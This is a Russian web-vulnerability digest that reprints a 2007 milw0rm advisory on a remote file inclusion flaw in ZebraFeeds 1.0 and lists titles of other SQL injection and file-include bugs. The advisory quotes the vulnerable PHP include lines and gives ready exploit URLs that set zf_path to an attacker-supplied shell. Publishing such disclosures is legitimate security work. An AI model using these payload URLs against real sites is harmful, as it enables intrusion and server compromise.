Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl ) Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability CodeAvalanche News SQL Injection nabopoll 1.2 Remote Unprotected Admin Section Vulnerability nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability From:ThE dE@Th <mostafa_ragab_(at)_msn.com> Date:15 февраля 2007 г.Subject:ZebraFeeds 1.0 (zf_path) Remote File Include VulnerabilitiesTo ConTacT mE @ wWw.Asb-May.net/bb ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>> ****************************************************************************** aggregator.php:- require_once($zf_path . 'includes/feed.php'); require_once($zf_path . 'includes/view.php'); require_once($zf_path . 'includes/template.php'); require_once($zf_path . 'magpierss/rss_fetch.inc'); controller.php:- require_once($zf_path . 'includes/template.php'); require_once($zf_path . 'includes/opml.php'); ******************************************************************************** ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell] ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell] ******************************************************************************* # milw0rm.com [2007-02-15]
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability
CodeAvalanche News SQL Injection
nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
